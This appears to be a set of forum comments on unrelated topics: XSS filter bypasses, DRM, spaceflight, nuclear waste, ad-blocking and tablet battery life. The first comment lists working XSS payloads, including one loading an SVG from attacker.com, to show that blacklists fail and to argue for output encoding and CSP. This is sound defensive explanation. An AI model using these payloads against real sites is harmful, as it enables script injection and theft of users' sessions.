<img src="xss" onerror="alert('Nope!')" />
<iframe src="javascript:alert('That won't work.')"></iframe>
<object data="http://attacker.com/SvgCanContainScriptsAndCanUseTheParentObjectToAttackTheHostingPage.svg"></object>
<scri<scriptpt>alert("In fact, that kind of blacklisting is trivial to bypass.");</script>
<form action="javascript:alert('I once spent a month breaking a client's blacklist every time they updated it to block my last POC exploit, telling them all the while they had to use output encoding.');"><input type="submit" value="SPOILER" /></form>
<h1 onmouseover="alert('They eventually did, but oh man did they waste a lot of time trying variants on your suggestion first!')">REALLY BIG TEXT THAT YOUR MOUSE WILL GO OVER</h1>

People thinking like you do frequently leads to exactly this sort of problem, where something *supposedly* has XSS protection but in fact totally doesn't. With the possible exception of the nested script tags (if you're smart enough to run the filter repeatedly until no further hits occur, that'll be caught), every single one of these lines will execute arbitrary attacker-controlled JavaScript through the filter that you propose. I strongly recommend that you go read OWASP, especially the top 10, and in the meantime I hope you haven't written any in-production web applications...

Content Security Policy (as you link) is indeed a "better" solution, in the technical sense; it's fine-grained, supports reporting, doesn't require servers to generate the random "hard_to_guess_string" needed to unlock the block, and (possibly most important) doesn't introduce a new un-XML-like construct into HTML. On the other hand, it tends to be more complicated to use it in real-world web applications, and it's so broad that a lot of browsers have either no support for it or have serious bugs in their support (did you know SVG can contain scripts, and sometimes CSP rules aren't applied properly there?).

Sandboxed iframes are simpler and basically do what you're asking for, except that the content is loaded from an external source or by writing it into the framed document (if same-origin); no need to worry about an attacker terminating the sandbox with a </iframe> tag because the sandboxed content isn't inline with the iframe itself. On the other hand, given how few people actually use them (despite pretty good browser support), the problem may be more a matter of web devs being bad at security than of web devs not having good security tools. Of course, we knew that already...

With all that said, I feel compelled to point out that *just* blocking XSS isn't enough anyhow. Without using a single scripted behavior (just HTML and some simple CSS) I can do things like create a lightbox that contains an HTML form saying "Your login session has expired. To ensure the security of your account, please log in again." with a username/password box, all themed accordingly with the site I'm attacking. Of course, the form POSTs to a web server that I (the attacker) control, but you don't know that. There's many other types of things you can do with the same restrictions. It's not enough to block scripts and plugins, you also have to prevent the attacker from simply taking over the page with their own content by layering it on top of the Z-order.

It seems you forgot to quote the later part of that post, where I did acknowledge the problem of content that comes malware-laden... Personally, I don't buy AAA games any more (nor do I pirate them instead). I got bored of the generally poor quality and accompanying malware breaking things a few years ago. Given the comments I see every time gamers' enjoyment of a big new title is spoiled because someone's DRM screwed up again, I suspect my life is still better that way. However, I do miss and would gladly pay for the kind of experience I used to enjoy from the top end games of yesteryear, before everything went downhill when the Internet became an excuse for shipping software that wasn't finished yet (we'll just patch it later, or not) and using ever more obnoxious DRM schemes (of course we can expect gamers to be online with a perfect connection any time they're playing our game).

Source? Given the extreme cost of any wasted launch mass, I can't imagine they would operate every launch armed. That they have experimented with arming the capsules would be no surprise - I'd be shocked if they hadn't experimented with arming *some* of their spacecraft, even if only unmanned satellites - and they might even have launched armed craft, but I sincerely doubt they've done so on *every* launch.

Not sure if serious, so I'll respond as if you are: nuclear waste does not "explode". The reason it's "waste" is because it no longer is even capable of maintaining a barely critical chain reaction in a moderated reactor core (neutron moderation - slowing them down to the point that they can be captured by other nuclei - is an important part of reactor operation). By itself, it's hot (decay heat) and radioactive (most of the half-lives are really long, so it doesn't actually release a ton of radiation per unit time but it will keep doing it for a long time), but that's about it. Now, it could be reprocessed to remove the low-grade stuff and refine out the actually really useful material. Only about 3% of the potential energy gets extracted from fuel in modern reactors before it drops to the point of being unable to maintain criticality, but with enough work you can purify it and make it usable again. You could, in fact, purify it even more to the point where it will go supercritical *without* a reactor core's moderation - this is one way to make bomb-grade material - but that's difficult, expensive, and never going to happen naturally.

Oh, that's hardly true. As a random example, SpaceX's Merlin rockets (currently on their 4th revision, not counting the difference between atmospheric and vacuum variants) have the highest thrust-to-weight ratio of any production rocket engine, and they are a very recent design. The Space Shuttle Main Engines have a significantly higher specific impulse (thust*time per mass of fuel) but the fuel (hydrogen) is so low-density that you need a ton of it to get anywhere, and volume has its own costs (especially in atmosphere). The SSMEs also went through a number of revisions that increased their power and efficiency.

On the other hand, just because SpaceX is busy pushing the bounds of chemical rockets does not, by any means, mean we shouldn't be researching alternate thrust systems... and we are! Not as enthusiastically as I'd like to see, but it's happening. There's research into high-efficiency space drives, alternate launch systems, and even some research into drives which have the capability to make interstellar flight potentially feasible. None of these are close to production, and some of them (especially the ones involving nuclear-powered drives) have been mothballed for years or decades, but even if the test apparatus (for those projects which got so far) no longer exist, the designs and theories and mathematics do, and rocket scientists can and do continue building on those. I'd really like to see practical research start up again on these: http://en.wikipedia.org/wiki/N..., such as this project (which was building and testing actual hardware!) from the 70s: http://en.wikipedia.org/wiki/N...

Of course they are. But the fact is that when the law says things are required to work a certain way, and everyone knows the deal up-front, breaking that law is a different issue to just not doing something entirely voluntary that someone else would have preferred you to do.

Laws may not perfectly follow morals and ethics, but the intent is that they do at least reflect them reasonably well and provide a common standard for acceptable behaviour that everyone knows.

So far, I don't see a lot of that happening. Occasionally I see sites begging you to turn your ad-blocker off, and if they're sites I like then I do have some sympathy.

Unfortunately, from bitter personal experience, ad networks are a threat. There is currently no way to reliably distinguish which parts are dangerous soon enough, so the default safest option is to block the lot.

Very occasionally, I do find a site that doesn't work properly because of the things I block, and then I just go somewhere else instead. Exactly zero sites I need to use have this problem, or rely on ads at all for that matter. It would be sad if all those ad-funded sites went away, but frankly it wouldn't break the Internet and whatever replaced them would probably be a better model for all concerned (except middle-man ad networks).

I may be literally worthless to such sites. I just don't think they ever had a reasonable expectation that I would be any more than that, any more than someone paying for an ad on a billboard has a reasonable expectation that every driver will stop and read it, or any TV advertiser has a reasonable expectation that no-one is going to go take a leak during the ad break.

There is no law requiring someone to give their time to the ads just because they are there, and there never has been, making this a fundamentally different situation to copyright infringement, fraud, or whatever other bad analogies people are throwing around in today's discussion.

Ultimately, if someone wants a promise to be paid in return for their work, there are a number of options available to them, starting with charging for it just like every other industry in the world that produces value. And if the work has some modest value to a lot of people but the overheads of formally charging are too great, there are plenty of other ways to accumulate minor contributions without spamming disreputable ad networks all over your site.

Not really.

One obvious difference is that the law generally prohibits copying a copyrighted work without complying with the copyright holder's terms for payment etc. There is no analogous law about downloading freely available content without viewing the ads, unless you want to start arguing that the implicit permission to access that content does not apply if you don't view the ads as well, which is quite the can of worms to open.

Another obvious difference is that buying a legal copy of a creative work does not in itself subject me to severely degraded system performance, wasting arbitrary amounts of bandwidth I'm already paying for on things I didn't ask for, or assorted security and privacy risks. Not blocking ads and trackers on-line does all of these things. (Obviously some content comes with DRM and similar malware that also does some or all of these things, but let's not conflate buying from dubious sources with buying at all.)

It's cheaper and there's less airport chaos if you fly on Thanksgiving or Christmas.

Someone made a web thing so you can erase the old text and put in your own. I did one. I think it significantly improves on the original page.

https://computer-engineer-barb...

Do you have any basis for this "hard time believing" or are you just going to ignore evidence in favor of your prejudices?

Don't get me wrong, I was *surprised* by the finding; I live in Seattle, and there are a large population of minorities (blacks, Native Americans, and Hispanics are still very rare in tech, but Indians and various Chinese/Korean/I-can't-tell-by-looking Asian ethnicities are common and I would have guessed they are becoming more common). On the other hand, the rents *are* going up - significantly faster than inflation, in most parts of the city - and that will tend to drive the not-in-tech ethnicities out because they can't command salaries commensurate with the rising cost of living. Seattle has plenty of suburbs (though our relatively awful public transit system means commuting from the suburbs is either very slow or requires a car) and it's not at all inconceivable that the city itself is getting whiter.

Speaking as a cis het white male from a family of above-median income, *you* appear to be (at a minimum) overreacting to the whole "white male guilt" meme, accusing people of "throwing race into the mix" and "stok[ing]" guilt even when citing simple facts. I guess if those facts don't agree with your prejudices then they must be the work of people out to make you feel guilty? Sucks to be you, I guess...

Also, of all the things to critique this study for, you chose them reporting the racial shift? There are far more valid critiques available.

Citation on the "legalized drugs" causing a problem? It's not like weed was hard to get before, you just had to buy it from criminals and were a criminal yourself for doing so. Now that this is no longer true, people have less, not more, incentive to commit crimes.

Outlawed firearms: you don't live anywhere near WA, do you? The state rate of concealed carry is quite high, especially for a "blue" state. People raise a fuss about it sometimes, but overall there's still a good number of guns around.

This makes me wonder how well battery-optimized Sailfish is (and its apps are). I never owned an N900 or N9, or used one for long enough to get a really good feel for the battery life, but even when new, the N800 could not last even the waking hours of a day. That's assuming I used it similar to how I use the smartphone I got a couple years later (which would last well into a second day, and which - unlike the N800 - has a cellular radio chip).

Anyhow, my point is that most Maemo (N800 OS) apps were really poorly optimized for battery life - not surprisingly, all things considered - and the multitasking model of the OS just compounded the problem unless you were obsessive about closing stuff that you didn't need to have in the background. So, when I hear that a new tablet based on a descendant of Maemo has 2/3 the battery capacity of its competitors, I get concerned. There are mobile OSes that could probably get by with capacity like that, but Maemo was emphatically not one of them. On the other hand, six years is a long time; maybe they've fixed all that now and Sailfish *is* one of the more efficient OSes. If it has true, "desktop-style" multitasking, though, I doubt it.